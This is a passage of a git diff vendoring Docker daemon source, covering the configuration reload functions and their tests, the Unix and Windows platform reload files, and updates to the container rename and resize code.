+ daemon.configStore.Unlock() + if err == nil { + logrus.Infof("Reloaded configuration: %s", jsonString) + daemon.LogDaemonEventWithAttributes("reload", attributes) + } + }() + + if err := daemon.reloadPlatform(conf, attributes); err != nil { + return err + } + daemon.reloadDebug(conf, attributes) + daemon.reloadMaxConcurrentDownloadsAndUploads(conf, attributes) + daemon.reloadShutdownTimeout(conf, attributes) + + if err := daemon.reloadClusterDiscovery(conf, attributes); err != nil { + return err + } + if err := daemon.reloadLabels(conf, attributes); err != nil { + return err + } + if err := daemon.reloadAllowNondistributableArtifacts(conf, attributes); err != nil { + return err + } + if err := daemon.reloadInsecureRegistries(conf, attributes); err != nil { + return err + } + if err := daemon.reloadRegistryMirrors(conf, attributes); err != nil { + return err + } + if err := daemon.reloadLiveRestore(conf, attributes); err != nil { + return err + } + return daemon.reloadNetworkDiagnosticPort(conf, attributes) +} + +// reloadDebug updates configuration with Debug option +// and updates the passed attributes +func (daemon *Daemon) reloadDebug(conf *config.Config, attributes map[string]string) { + // update corresponding configuration + if conf.IsValueSet("debug") { + daemon.configStore.Debug = conf.Debug + } + // prepare reload event attributes with updatable configurations + attributes["debug"] = fmt.Sprintf("%t", daemon.configStore.Debug) +} + +// reloadMaxConcurrentDownloadsAndUploads updates configuration with max concurrent +// download and upload options and updates the passed attributes +func (daemon *Daemon) reloadMaxConcurrentDownloadsAndUploads(conf *config.Config, attributes map[string]string) { + // If no value is set for max-concurrent-downloads we assume it is the default value + // We always "reset" as the cost is lightweight and easy to maintain. 
+ if conf.IsValueSet("max-concurrent-downloads") && conf.MaxConcurrentDownloads != nil { + *daemon.configStore.MaxConcurrentDownloads = *conf.MaxConcurrentDownloads + } else { + maxConcurrentDownloads := config.DefaultMaxConcurrentDownloads + daemon.configStore.MaxConcurrentDownloads = &maxConcurrentDownloads + } + logrus.Debugf("Reset Max Concurrent Downloads: %d", *daemon.configStore.MaxConcurrentDownloads) + + // If no value is set for max-concurrent-upload we assume it is the default value + // We always "reset" as the cost is lightweight and easy to maintain. + if conf.IsValueSet("max-concurrent-uploads") && conf.MaxConcurrentUploads != nil { + *daemon.configStore.MaxConcurrentUploads = *conf.MaxConcurrentUploads + } else { + maxConcurrentUploads := config.DefaultMaxConcurrentUploads + daemon.configStore.MaxConcurrentUploads = &maxConcurrentUploads + } + logrus.Debugf("Reset Max Concurrent Uploads: %d", *daemon.configStore.MaxConcurrentUploads) + + daemon.imageService.UpdateConfig(conf.MaxConcurrentDownloads, conf.MaxConcurrentUploads) + // prepare reload event attributes with updatable configurations + attributes["max-concurrent-downloads"] = fmt.Sprintf("%d", *daemon.configStore.MaxConcurrentDownloads) + // prepare reload event attributes with updatable configurations + attributes["max-concurrent-uploads"] = fmt.Sprintf("%d", *daemon.configStore.MaxConcurrentUploads) +} + +// reloadShutdownTimeout updates configuration with daemon shutdown timeout option +// and updates the passed attributes +func (daemon *Daemon) reloadShutdownTimeout(conf *config.Config, attributes map[string]string) { + // update corresponding configuration + if conf.IsValueSet("shutdown-timeout") { + daemon.configStore.ShutdownTimeout = conf.ShutdownTimeout + logrus.Debugf("Reset Shutdown Timeout: %d", daemon.configStore.ShutdownTimeout) + } + + // prepare reload event attributes with updatable configurations + attributes["shutdown-timeout"] = fmt.Sprintf("%d", 
daemon.configStore.ShutdownTimeout) +} + +// reloadClusterDiscovery updates configuration with cluster discovery options +// and updates the passed attributes +func (daemon *Daemon) reloadClusterDiscovery(conf *config.Config, attributes map[string]string) (err error) { + defer func() { + // prepare reload event attributes with updatable configurations + attributes["cluster-store"] = conf.ClusterStore + attributes["cluster-advertise"] = conf.ClusterAdvertise + + attributes["cluster-store-opts"] = "{}" + if daemon.configStore.ClusterOpts != nil { + opts, err2 := json.Marshal(conf.ClusterOpts) + if err != nil { + err = err2 + } + attributes["cluster-store-opts"] = string(opts) + } + }() + + newAdvertise := conf.ClusterAdvertise + newClusterStore := daemon.configStore.ClusterStore + if conf.IsValueSet("cluster-advertise") { + if conf.IsValueSet("cluster-store") { + newClusterStore = conf.ClusterStore + } + newAdvertise, err = config.ParseClusterAdvertiseSettings(newClusterStore, conf.ClusterAdvertise) + if err != nil && err != discovery.ErrDiscoveryDisabled { + return err + } + } + + if daemon.clusterProvider != nil { + if err := conf.IsSwarmCompatible(); err != nil { + return err + } + } + + // check discovery modifications + if !config.ModifiedDiscoverySettings(daemon.configStore, newClusterStore, newAdvertise, conf.ClusterOpts) { + return nil + } + + // enable discovery for the first time if it was not previously enabled + if daemon.discoveryWatcher == nil { + discoveryWatcher, err := discovery.Init(newClusterStore, newAdvertise, conf.ClusterOpts) + if err != nil { + return fmt.Errorf("failed to initialize discovery: %v", err) + } + daemon.discoveryWatcher = discoveryWatcher + } else if err == discovery.ErrDiscoveryDisabled { + // disable discovery if it was previously enabled and it's disabled now + daemon.discoveryWatcher.Stop() + } else if err = daemon.discoveryWatcher.Reload(conf.ClusterStore, newAdvertise, conf.ClusterOpts); err != nil { + // reload discovery + 
return err + } + + daemon.configStore.ClusterStore = newClusterStore + daemon.configStore.ClusterOpts = conf.ClusterOpts + daemon.configStore.ClusterAdvertise = newAdvertise + + if daemon.netController == nil { + return nil + } + netOptions, err := daemon.networkOptions(daemon.configStore, daemon.PluginStore, nil) + if err != nil { + logrus.WithError(err).Warnf("failed to get options with network controller") + return nil + } + err = daemon.netController.ReloadConfiguration(netOptions...) + if err != nil { + logrus.Warnf("Failed to reload configuration with network controller: %v", err) + } + return nil +} + +// reloadLabels updates configuration with engine labels +// and updates the passed attributes +func (daemon *Daemon) reloadLabels(conf *config.Config, attributes map[string]string) error { + // update corresponding configuration + if conf.IsValueSet("labels") { + daemon.configStore.Labels = conf.Labels + } + + // prepare reload event attributes with updatable configurations + if daemon.configStore.Labels != nil { + labels, err := json.Marshal(daemon.configStore.Labels) + if err != nil { + return err + } + attributes["labels"] = string(labels) + } else { + attributes["labels"] = "[]" + } + + return nil +} + +// reloadAllowNondistributableArtifacts updates the configuration with allow-nondistributable-artifacts options +// and updates the passed attributes. +func (daemon *Daemon) reloadAllowNondistributableArtifacts(conf *config.Config, attributes map[string]string) error { + // Update corresponding configuration. + if conf.IsValueSet("allow-nondistributable-artifacts") { + daemon.configStore.AllowNondistributableArtifacts = conf.AllowNondistributableArtifacts + if err := daemon.RegistryService.LoadAllowNondistributableArtifacts(conf.AllowNondistributableArtifacts); err != nil { + return err + } + } + + // Prepare reload event attributes with updatable configurations. 
+ if daemon.configStore.AllowNondistributableArtifacts != nil { + v, err := json.Marshal(daemon.configStore.AllowNondistributableArtifacts) + if err != nil { + return err + } + attributes["allow-nondistributable-artifacts"] = string(v) + } else { + attributes["allow-nondistributable-artifacts"] = "[]" + } + + return nil +} + +// reloadInsecureRegistries updates configuration with insecure registry option +// and updates the passed attributes +func (daemon *Daemon) reloadInsecureRegistries(conf *config.Config, attributes map[string]string) error { + // update corresponding configuration + if conf.IsValueSet("insecure-registries") { + daemon.configStore.InsecureRegistries = conf.InsecureRegistries + if err := daemon.RegistryService.LoadInsecureRegistries(conf.InsecureRegistries); err != nil { + return err + } + } + + // prepare reload event attributes with updatable configurations + if daemon.configStore.InsecureRegistries != nil { + insecureRegistries, err := json.Marshal(daemon.configStore.InsecureRegistries) + if err != nil { + return err + } + attributes["insecure-registries"] = string(insecureRegistries) + } else { + attributes["insecure-registries"] = "[]" + } + + return nil +} + +// reloadRegistryMirrors updates configuration with registry mirror options +// and updates the passed attributes +func (daemon *Daemon) reloadRegistryMirrors(conf *config.Config, attributes map[string]string) error { + // update corresponding configuration + if conf.IsValueSet("registry-mirrors") { + daemon.configStore.Mirrors = conf.Mirrors + if err := daemon.RegistryService.LoadMirrors(conf.Mirrors); err != nil { + return err + } + } + + // prepare reload event attributes with updatable configurations + if daemon.configStore.Mirrors != nil { + mirrors, err := json.Marshal(daemon.configStore.Mirrors) + if err != nil { + return err + } + attributes["registry-mirrors"] = string(mirrors) + } else { + attributes["registry-mirrors"] = "[]" + } + + return nil +} + +// reloadLiveRestore 
updates configuration with live retore option +// and updates the passed attributes +func (daemon *Daemon) reloadLiveRestore(conf *config.Config, attributes map[string]string) error { + // update corresponding configuration + if conf.IsValueSet("live-restore") { + daemon.configStore.LiveRestoreEnabled = conf.LiveRestoreEnabled + } + + // prepare reload event attributes with updatable configurations + attributes["live-restore"] = fmt.Sprintf("%t", daemon.configStore.LiveRestoreEnabled) + return nil +} + +// reloadNetworkDiagnosticPort updates the network controller starting the diagnostic if the config is valid +func (daemon *Daemon) reloadNetworkDiagnosticPort(conf *config.Config, attributes map[string]string) error { + if conf == nil || daemon.netController == nil || !conf.IsValueSet("network-diagnostic-port") || + conf.NetworkDiagnosticPort < 1 || conf.NetworkDiagnosticPort > 65535 { + // If there is no config make sure that the diagnostic is off + if daemon.netController != nil { + daemon.netController.StopDiagnostic() + } + return nil + } + // Enable the network diagnostic if the flag is set with a valid port withing the range + logrus.WithFields(logrus.Fields{"port": conf.NetworkDiagnosticPort, "ip": "127.0.0.1"}).Warn("Starting network diagnostic server") + daemon.netController.StartDiagnostic(conf.NetworkDiagnosticPort) + + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/reload_test.go b/vendor/github.com/docker/docker/daemon/reload_test.go new file mode 100644 index 0000000000..ffad297f71 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/reload_test.go @@ -0,0 +1,573 @@ +package daemon // import "github.com/docker/docker/daemon" + +import ( + "os" + "reflect" + "sort" + "testing" + "time" + + "github.com/docker/docker/daemon/config" + "github.com/docker/docker/daemon/images" + "github.com/docker/docker/pkg/discovery" + _ "github.com/docker/docker/pkg/discovery/memory" + "github.com/docker/docker/registry" + 
"github.com/docker/libnetwork" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestDaemonReloadLabels(t *testing.T) { + daemon := &Daemon{ + configStore: &config.Config{ + CommonConfig: config.CommonConfig{ + Labels: []string{"foo:bar"}, + }, + }, + imageService: images.NewImageService(images.ImageServiceConfig{}), + } + + valuesSets := make(map[string]interface{}) + valuesSets["labels"] = "foo:baz" + newConfig := &config.Config{ + CommonConfig: config.CommonConfig{ + Labels: []string{"foo:baz"}, + ValuesSet: valuesSets, + }, + } + + if err := daemon.Reload(newConfig); err != nil { + t.Fatal(err) + } + + label := daemon.configStore.Labels[0] + if label != "foo:baz" { + t.Fatalf("Expected daemon label `foo:baz`, got %s", label) + } +} + +func TestDaemonReloadAllowNondistributableArtifacts(t *testing.T) { + daemon := &Daemon{ + configStore: &config.Config{}, + imageService: images.NewImageService(images.ImageServiceConfig{}), + } + + var err error + // Initialize daemon with some registries. + daemon.RegistryService, err = registry.NewService(registry.ServiceOptions{ + AllowNondistributableArtifacts: []string{ + "127.0.0.0/8", + "10.10.1.11:5000", + "10.10.1.22:5000", // This will be removed during reload. + "docker1.com", + "docker2.com", // This will be removed during reload. + }, + }) + if err != nil { + t.Fatal(err) + } + + registries := []string{ + "127.0.0.0/8", + "10.10.1.11:5000", + "10.10.1.33:5000", // This will be added during reload. + "docker1.com", + "docker3.com", // This will be added during reload. 
+ } + + newConfig := &config.Config{ + CommonConfig: config.CommonConfig{ + ServiceOptions: registry.ServiceOptions{ + AllowNondistributableArtifacts: registries, + }, + ValuesSet: map[string]interface{}{ + "allow-nondistributable-artifacts": registries, + }, + }, + } + + if err := daemon.Reload(newConfig); err != nil { + t.Fatal(err) + } + + var actual []string + serviceConfig := daemon.RegistryService.ServiceConfig() + for _, value := range serviceConfig.AllowNondistributableArtifactsCIDRs { + actual = append(actual, value.String()) + } + actual = append(actual, serviceConfig.AllowNondistributableArtifactsHostnames...) + + sort.Strings(registries) + sort.Strings(actual) + assert.Check(t, is.DeepEqual(registries, actual)) +} + +func TestDaemonReloadMirrors(t *testing.T) { + daemon := &Daemon{ + imageService: images.NewImageService(images.ImageServiceConfig{}), + } + var err error + daemon.RegistryService, err = registry.NewService(registry.ServiceOptions{ + InsecureRegistries: []string{}, + Mirrors: []string{ + "https://mirror.test1.com", + "https://mirror.test2.com", // this will be removed when reloading + "https://mirror.test3.com", // this will be removed when reloading + }, + }) + if err != nil { + t.Fatal(err) + } + + daemon.configStore = &config.Config{} + + type pair struct { + valid bool + mirrors []string + after []string + } + + loadMirrors := []pair{ + { + valid: false, + mirrors: []string{"10.10.1.11:5000"}, // this mirror is invalid + after: []string{}, + }, + { + valid: false, + mirrors: []string{"mirror.test1.com"}, // this mirror is invalid + after: []string{}, + }, + { + valid: false, + mirrors: []string{"10.10.1.11:5000", "mirror.test1.com"}, // mirrors are invalid + after: []string{}, + }, + { + valid: true, + mirrors: []string{"https://mirror.test1.com", "https://mirror.test4.com"}, + after: []string{"https://mirror.test1.com/", "https://mirror.test4.com/"}, + }, + } + + for _, value := range loadMirrors { + valuesSets := 
make(map[string]interface{}) + valuesSets["registry-mirrors"] = value.mirrors + + newConfig := &config.Config{ + CommonConfig: config.CommonConfig{ + ServiceOptions: registry.ServiceOptions{ + Mirrors: value.mirrors, + }, + ValuesSet: valuesSets, + }, + } + + err := daemon.Reload(newConfig) + if !value.valid && err == nil { + // mirrors should be invalid, should be a non-nil error + t.Fatalf("Expected daemon reload error with invalid mirrors: %s, while get nil", value.mirrors) + } + + if value.valid { + if err != nil { + // mirrors should be valid, should be no error + t.Fatal(err) + } + registryService := daemon.RegistryService.ServiceConfig() + + if len(registryService.Mirrors) != len(value.after) { + t.Fatalf("Expected %d daemon mirrors %s while get %d with %s", + len(value.after), + value.after, + len(registryService.Mirrors), + registryService.Mirrors) + } + + dataMap := map[string]struct{}{} + + for _, mirror := range registryService.Mirrors { + if _, exist := dataMap[mirror]; !exist { + dataMap[mirror] = struct{}{} + } + } + + for _, address := range value.after { + if _, exist := dataMap[address]; !exist { + t.Fatalf("Expected %s in daemon mirrors, while get none", address) + } + } + } + } +} + +func TestDaemonReloadInsecureRegistries(t *testing.T) { + daemon := &Daemon{ + imageService: images.NewImageService(images.ImageServiceConfig{}), + } + var err error + // initialize daemon with existing insecure registries: "127.0.0.0/8", "10.10.1.11:5000", "10.10.1.22:5000" + daemon.RegistryService, err = registry.NewService(registry.ServiceOptions{ + InsecureRegistries: []string{ + "127.0.0.0/8", + "10.10.1.11:5000", + "10.10.1.22:5000", // this will be removed when reloading + "docker1.com", + "docker2.com", // this will be removed when reloading + }, + }) + if err != nil { + t.Fatal(err) + } + + daemon.configStore = &config.Config{} + + insecureRegistries := []string{ + "127.0.0.0/8", // this will be kept + "10.10.1.11:5000", // this will be kept + 
"10.10.1.33:5000", // this will be newly added + "docker1.com", // this will be kept + "docker3.com", // this will be newly added + } + + valuesSets := make(map[string]interface{}) + valuesSets["insecure-registries"] = insecureRegistries + + newConfig := &config.Config{ + CommonConfig: config.CommonConfig{ + ServiceOptions: registry.ServiceOptions{ + InsecureRegistries: insecureRegistries, + }, + ValuesSet: valuesSets, + }, + } + + if err := daemon.Reload(newConfig); err != nil { + t.Fatal(err) + } + + // After Reload, daemon.RegistryService will be changed which is useful + // for registry communication in daemon. + registries := daemon.RegistryService.ServiceConfig() + + // After Reload(), newConfig has come to registries.InsecureRegistryCIDRs and registries.IndexConfigs in daemon. + // Then collect registries.InsecureRegistryCIDRs in dataMap. + // When collecting, we need to convert CIDRS into string as a key, + // while the times of key appears as value. + dataMap := map[string]int{} + for _, value := range registries.InsecureRegistryCIDRs { + if _, ok := dataMap[value.String()]; !ok { + dataMap[value.String()] = 1 + } else { + dataMap[value.String()]++ + } + } + + for _, value := range registries.IndexConfigs { + if _, ok := dataMap[value.Name]; !ok { + dataMap[value.Name] = 1 + } else { + dataMap[value.Name]++ + } + } + + // Finally compare dataMap with the original insecureRegistries. + // Each value in insecureRegistries should appear in daemon's insecure registries, + // and each can only appear exactly ONCE. 
+ for _, r := range insecureRegistries { + if value, ok := dataMap[r]; !ok { + t.Fatalf("Expected daemon insecure registry %s, got none", r) + } else if value != 1 { + t.Fatalf("Expected only 1 daemon insecure registry %s, got %d", r, value) + } + } + + // assert if "10.10.1.22:5000" is removed when reloading + if value, ok := dataMap["10.10.1.22:5000"]; ok { + t.Fatalf("Expected no insecure registry of 10.10.1.22:5000, got %d", value) + } + + // assert if "docker2.com" is removed when reloading + if value, ok := dataMap["docker2.com"]; ok { + t.Fatalf("Expected no insecure registry of docker2.com, got %d", value) + } +} + +func TestDaemonReloadNotAffectOthers(t *testing.T) { + daemon := &Daemon{ + imageService: images.NewImageService(images.ImageServiceConfig{}), + } + daemon.configStore = &config.Config{ + CommonConfig: config.CommonConfig{ + Labels: []string{"foo:bar"}, + Debug: true, + }, + } + + valuesSets := make(map[string]interface{}) + valuesSets["labels"] = "foo:baz" + newConfig := &config.Config{ + CommonConfig: config.CommonConfig{ + Labels: []string{"foo:baz"}, + ValuesSet: valuesSets, + }, + } + + if err := daemon.Reload(newConfig); err != nil { + t.Fatal(err) + } + + label := daemon.configStore.Labels[0] + if label != "foo:baz" { + t.Fatalf("Expected daemon label `foo:baz`, got %s", label) + } + debug := daemon.configStore.Debug + if !debug { + t.Fatal("Expected debug 'enabled', got 'disabled'") + } +} + +func TestDaemonDiscoveryReload(t *testing.T) { + daemon := &Daemon{ + imageService: images.NewImageService(images.ImageServiceConfig{}), + } + daemon.configStore = &config.Config{ + CommonConfig: config.CommonConfig{ + ClusterStore: "memory://127.0.0.1", + ClusterAdvertise: "127.0.0.1:3333", + }, + } + + if err := daemon.initDiscovery(daemon.configStore); err != nil { + t.Fatal(err) + } + + expected := discovery.Entries{ + &discovery.Entry{Host: "127.0.0.1", Port: "3333"}, + } + + select { + case <-time.After(10 * time.Second): + t.Fatal("timeout 
waiting for discovery") + case <-daemon.discoveryWatcher.ReadyCh(): + } + + stopCh := make(chan struct{}) + defer close(stopCh) + ch, errCh := daemon.discoveryWatcher.Watch(stopCh) + + select { + case <-time.After(1 * time.Second): + t.Fatal("failed to get discovery advertisements in time") + case e := <-ch: + if !reflect.DeepEqual(e, expected) { + t.Fatalf("expected %v, got %v\n", expected, e) + } + case e := <-errCh: + t.Fatal(e) + } + + valuesSets := make(map[string]interface{}) + valuesSets["cluster-store"] = "memory://127.0.0.1:2222" + valuesSets["cluster-advertise"] = "127.0.0.1:5555" + newConfig := &config.Config{ + CommonConfig: config.CommonConfig{ + ClusterStore: "memory://127.0.0.1:2222", + ClusterAdvertise: "127.0.0.1:5555", + ValuesSet: valuesSets, + }, + } + + expected = discovery.Entries{ + &discovery.Entry{Host: "127.0.0.1", Port: "5555"}, + } + + if err := daemon.Reload(newConfig); err != nil { + t.Fatal(err) + } + + select { + case <-time.After(10 * time.Second): + t.Fatal("timeout waiting for discovery") + case <-daemon.discoveryWatcher.ReadyCh(): + } + + ch, errCh = daemon.discoveryWatcher.Watch(stopCh) + + select { + case <-time.After(1 * time.Second): + t.Fatal("failed to get discovery advertisements in time") + case e := <-ch: + if !reflect.DeepEqual(e, expected) { + t.Fatalf("expected %v, got %v\n", expected, e) + } + case e := <-errCh: + t.Fatal(e) + } +} + +func TestDaemonDiscoveryReloadFromEmptyDiscovery(t *testing.T) { + daemon := &Daemon{ + imageService: images.NewImageService(images.ImageServiceConfig{}), + } + daemon.configStore = &config.Config{} + + valuesSet := make(map[string]interface{}) + valuesSet["cluster-store"] = "memory://127.0.0.1:2222" + valuesSet["cluster-advertise"] = "127.0.0.1:5555" + newConfig := &config.Config{ + CommonConfig: config.CommonConfig{ + ClusterStore: "memory://127.0.0.1:2222", + ClusterAdvertise: "127.0.0.1:5555", + ValuesSet: valuesSet, + }, + } + + expected := discovery.Entries{ + 
&discovery.Entry{Host: "127.0.0.1", Port: "5555"}, + } + + if err := daemon.Reload(newConfig); err != nil { + t.Fatal(err) + } + + select { + case <-time.After(10 * time.Second): + t.Fatal("timeout waiting for discovery") + case <-daemon.discoveryWatcher.ReadyCh(): + } + + stopCh := make(chan struct{}) + defer close(stopCh) + ch, errCh := daemon.discoveryWatcher.Watch(stopCh) + + select { + case <-time.After(1 * time.Second): + t.Fatal("failed to get discovery advertisements in time") + case e := <-ch: + if !reflect.DeepEqual(e, expected) { + t.Fatalf("expected %v, got %v\n", expected, e) + } + case e := <-errCh: + t.Fatal(e) + } +} + +func TestDaemonDiscoveryReloadOnlyClusterAdvertise(t *testing.T) { + daemon := &Daemon{ + imageService: images.NewImageService(images.ImageServiceConfig{}), + } + daemon.configStore = &config.Config{ + CommonConfig: config.CommonConfig{ + ClusterStore: "memory://127.0.0.1", + }, + } + valuesSets := make(map[string]interface{}) + valuesSets["cluster-advertise"] = "127.0.0.1:5555" + newConfig := &config.Config{ + CommonConfig: config.CommonConfig{ + ClusterAdvertise: "127.0.0.1:5555", + ValuesSet: valuesSets, + }, + } + expected := discovery.Entries{ + &discovery.Entry{Host: "127.0.0.1", Port: "5555"}, + } + + if err := daemon.Reload(newConfig); err != nil { + t.Fatal(err) + } + + select { + case <-daemon.discoveryWatcher.ReadyCh(): + case <-time.After(10 * time.Second): + t.Fatal("Timeout waiting for discovery") + } + stopCh := make(chan struct{}) + defer close(stopCh) + ch, errCh := daemon.discoveryWatcher.Watch(stopCh) + + select { + case <-time.After(1 * time.Second): + t.Fatal("failed to get discovery advertisements in time") + case e := <-ch: + if !reflect.DeepEqual(e, expected) { + t.Fatalf("expected %v, got %v\n", expected, e) + } + case e := <-errCh: + t.Fatal(e) + } +} + +func TestDaemonReloadNetworkDiagnosticPort(t *testing.T) { + if os.Getuid() != 0 { + t.Skip("root required") + } + daemon := &Daemon{ + imageService: 
images.NewImageService(images.ImageServiceConfig{}), + } + daemon.configStore = &config.Config{} + + valuesSet := make(map[string]interface{}) + valuesSet["network-diagnostic-port"] = 2000 + enableConfig := &config.Config{ + CommonConfig: config.CommonConfig{ + NetworkDiagnosticPort: 2000, + ValuesSet: valuesSet, + }, + } + disableConfig := &config.Config{ + CommonConfig: config.CommonConfig{}, + } + + netOptions, err := daemon.networkOptions(enableConfig, nil, nil) + if err != nil { + t.Fatal(err) + } + controller, err := libnetwork.New(netOptions...) + if err != nil { + t.Fatal(err) + } + daemon.netController = controller + + // Enable/Disable the server for some iterations + for i := 0; i < 10; i++ { + enableConfig.CommonConfig.NetworkDiagnosticPort++ + if err := daemon.Reload(enableConfig); err != nil { + t.Fatal(err) + } + // Check that the diagnostic is enabled + if !daemon.netController.IsDiagnosticEnabled() { + t.Fatalf("diagnostic should be enable") + } + + // Reload + if err := daemon.Reload(disableConfig); err != nil { + t.Fatal(err) + } + // Check that the diagnostic is disabled + if daemon.netController.IsDiagnosticEnabled() { + t.Fatalf("diagnostic should be disable") + } + } + + enableConfig.CommonConfig.NetworkDiagnosticPort++ + // 2 times the enable should not create problems + if err := daemon.Reload(enableConfig); err != nil { + t.Fatal(err) + } + // Check that the diagnostic is enabled + if !daemon.netController.IsDiagnosticEnabled() { + t.Fatalf("diagnostic should be enable") + } + + // Check that another reload does not cause issues + if err := daemon.Reload(enableConfig); err != nil { + t.Fatal(err) + } + // Check that the diagnostic is enable + if !daemon.netController.IsDiagnosticEnabled() { + t.Fatalf("diagnostic should be enable") + } + +} diff --git a/vendor/github.com/docker/docker/daemon/reload_unix.go b/vendor/github.com/docker/docker/daemon/reload_unix.go new file mode 100644 index 0000000000..9c1bb992af --- /dev/null +++ 
b/vendor/github.com/docker/docker/daemon/reload_unix.go @@ -0,0 +1,56 @@ +// +build linux freebsd + +package daemon // import "github.com/docker/docker/daemon" + +import ( + "bytes" + "fmt" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/daemon/config" +) + +// reloadPlatform updates configuration with platform specific options +// and updates the passed attributes +func (daemon *Daemon) reloadPlatform(conf *config.Config, attributes map[string]string) error { + if err := conf.ValidatePlatformConfig(); err != nil { + return err + } + + if conf.IsValueSet("runtimes") { + // Always set the default one + conf.Runtimes[config.StockRuntimeName] = types.Runtime{Path: DefaultRuntimeBinary} + if err := daemon.initRuntimes(conf.Runtimes); err != nil { + return err + } + daemon.configStore.Runtimes = conf.Runtimes + } + + if conf.DefaultRuntime != "" { + daemon.configStore.DefaultRuntime = conf.DefaultRuntime + } + + if conf.IsValueSet("default-shm-size") { + daemon.configStore.ShmSize = conf.ShmSize + } + + if conf.IpcMode != "" { + daemon.configStore.IpcMode = conf.IpcMode + } + + // Update attributes + var runtimeList bytes.Buffer + for name, rt := range daemon.configStore.Runtimes { + if runtimeList.Len() > 0 { + runtimeList.WriteRune(' ') + } + runtimeList.WriteString(fmt.Sprintf("%s:%s", name, rt)) + } + + attributes["runtimes"] = runtimeList.String() + attributes["default-runtime"] = daemon.configStore.DefaultRuntime + attributes["default-shm-size"] = fmt.Sprintf("%d", daemon.configStore.ShmSize) + attributes["default-ipc-mode"] = daemon.configStore.IpcMode + + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/reload_windows.go b/vendor/github.com/docker/docker/daemon/reload_windows.go new file mode 100644 index 0000000000..548466e8ed --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/reload_windows.go @@ -0,0 +1,9 @@ +package daemon // import "github.com/docker/docker/daemon" + +import 
"github.com/docker/docker/daemon/config" + +// reloadPlatform updates configuration with platform specific options +// and updates the passed attributes +func (daemon *Daemon) reloadPlatform(config *config.Config, attributes map[string]string) error { + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/rename.go b/vendor/github.com/docker/docker/daemon/rename.go index ffb7715f23..2b2c48b292 100644 --- a/vendor/github.com/docker/docker/daemon/rename.go +++ b/vendor/github.com/docker/docker/daemon/rename.go @@ -1,12 +1,13 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( - "fmt" "strings" - "github.com/Sirupsen/logrus" dockercontainer "github.com/docker/docker/container" + "github.com/docker/docker/errdefs" "github.com/docker/libnetwork" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) // ContainerRename changes the name of a container, using the oldName @@ -19,7 +20,7 @@ func (daemon *Daemon) ContainerRename(oldName, newName string) error { ) if oldName == "" || newName == "" { - return fmt.Errorf("Neither old nor new names may be empty") + return errdefs.InvalidParameter(errors.New("Neither old nor new names may be empty")) } if newName[0] != '/' { @@ -31,30 +32,30 @@ func (daemon *Daemon) ContainerRename(oldName, newName string) error { return err } + container.Lock() + defer container.Unlock() + oldName = container.Name oldIsAnonymousEndpoint := container.NetworkSettings.IsAnonymousEndpoint if oldName == newName { - return fmt.Errorf("Renaming a container with the same name as its current name") + return errdefs.InvalidParameter(errors.New("Renaming a container with the same name as its current name")) } - container.Lock() - defer container.Unlock() - links := map[string]*dockercontainer.Container{} for k, v := range daemon.linkIndex.children(container) { if !strings.HasPrefix(k, oldName) { - return fmt.Errorf("Linked container %s does not match parent %s", k, oldName) + return 
errdefs.InvalidParameter(errors.Errorf("Linked container %s does not match parent %s", k, oldName)) } links[strings.TrimPrefix(k, oldName)] = v } if newName, err = daemon.reserveName(container.ID, newName); err != nil { - return fmt.Errorf("Error when allocating new name: %v", err) + return errors.Wrap(err, "Error when allocating new name") } for k, v := range links { - daemon.nameIndex.Reserve(newName+k, v.ID) + daemon.containersReplica.ReserveName(newName+k, v.ID) daemon.linkIndex.link(container, v, newName+k) } @@ -67,10 +68,10 @@ func (daemon *Daemon) ContainerRename(oldName, newName string) error { container.NetworkSettings.IsAnonymousEndpoint = oldIsAnonymousEndpoint daemon.reserveName(container.ID, oldName) for k, v := range links { - daemon.nameIndex.Reserve(oldName+k, v.ID) + daemon.containersReplica.ReserveName(oldName+k, v.ID) daemon.linkIndex.link(container, v, oldName+k) daemon.linkIndex.unlink(newName+k, v, container) - daemon.nameIndex.Release(newName + k) + daemon.containersReplica.ReleaseName(newName + k) } daemon.releaseName(newName) } @@ -78,10 +79,10 @@ func (daemon *Daemon) ContainerRename(oldName, newName string) error { for k, v := range links { daemon.linkIndex.unlink(oldName+k, v, container) - daemon.nameIndex.Release(oldName + k) + daemon.containersReplica.ReleaseName(oldName + k) } daemon.releaseName(oldName) - if err = container.ToDisk(); err != nil { + if err = container.CheckpointTo(daemon.containersReplica); err != nil { return err } @@ -98,14 +99,14 @@ func (daemon *Daemon) ContainerRename(oldName, newName string) error { if err != nil { container.Name = oldName container.NetworkSettings.IsAnonymousEndpoint = oldIsAnonymousEndpoint - if e := container.ToDisk(); e != nil { + if e := container.CheckpointTo(daemon.containersReplica); e != nil { logrus.Errorf("%s: Failed in writing to Disk on rename failure: %v", container.ID, e) } } }() sid = container.NetworkSettings.SandboxID - if daemon.netController != nil { + if sid != "" && 
daemon.netController != nil { sb, err = daemon.netController.SandboxByID(sid) if err != nil { return err diff --git a/vendor/github.com/docker/docker/daemon/resize.go b/vendor/github.com/docker/docker/daemon/resize.go index 747353852e..21240650f8 100644 --- a/vendor/github.com/docker/docker/daemon/resize.go +++ b/vendor/github.com/docker/docker/daemon/resize.go @@ -1,7 +1,9 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( + "context" "fmt" + "time" "github.com/docker/docker/libcontainerd" ) @@ -15,10 +17,10 @@ func (daemon *Daemon) ContainerResize(name string, height, width int) error { } if !container.IsRunning() { - return errNotRunning{container.ID} + return errNotRunning(container.ID) } - if err = daemon.containerd.Resize(container.ID, libcontainerd.InitFriendlyName, width, height); err == nil { + if err = daemon.containerd.ResizeTerminal(context.Background(), container.ID, libcontainerd.InitProcessName, width, height); err == nil { attributes := map[string]string{ "height": fmt.Sprintf("%d", height), "width": fmt.Sprintf("%d", width), @@ -36,5 +38,13 @@ func (daemon *Daemon) ContainerExecResize(name string, height, width int) error if err != nil { return err } - return daemon.containerd.Resize(ec.ContainerID, ec.ID, width, height) + // TODO: the timeout is hardcoded here, it would be more flexible to make it + // a parameter in resize request context, which would need API changes. 
